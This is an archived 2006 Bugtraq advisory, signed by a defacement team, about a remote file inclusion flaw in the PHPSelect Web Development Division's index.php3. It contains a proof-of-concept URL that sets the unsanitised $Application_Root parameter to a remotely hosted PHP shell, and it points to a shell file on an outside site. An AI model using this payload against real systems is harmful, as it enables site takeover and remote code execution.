lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 27 Sep 2006 00:00:12 -0000
From: stormhacker@...mail.com
To: bugtraq@...urityfocus.com
Subject: PHPSelect Web Development Division  <= Remote File Inclusion

+--------------------------------------------------------------------
+
+ PHPSelect Web Development Division :)  <= Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: PHPSelect Web Development Division
+ Venedor ...........: http://www.phpselect.com/  
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/ 
+ Contact ...........: stormhacker[at]hotmail[.]com
+
+--------------------------------------------------------------------
+
+ Code index.php3:
+
+ .....
+ include("$Application_Root/modules/include/global_settings");
+ .....
+
+--------------------------------------------------------------------
+
+ $Application_Root is not properly sanitized before being used.
+ The bug is in the "PDD" Package for PHPSelect Web Development Division.
+
+--------------------------------------------------------------------
+
+ Solution:
+ Add this line to your php-file:
+
+ $Application_Root ="user/dir" //Your root path
+
+--------------------------------------------------------------------
+ PoC:
+ Place a PHPShell on a remote location:
+ http://wdzone.net/sh.txt?
+
+
http://[target]/index.php3?Application_Root=http://phpshell
+
+--------------------------------------------------------------------
+ [W]orld [D]efacers [T]eam
+ Greets:
+ || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE ||
+ || Pro Hacker ||
+
+-------------------------[ W D T ]----------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ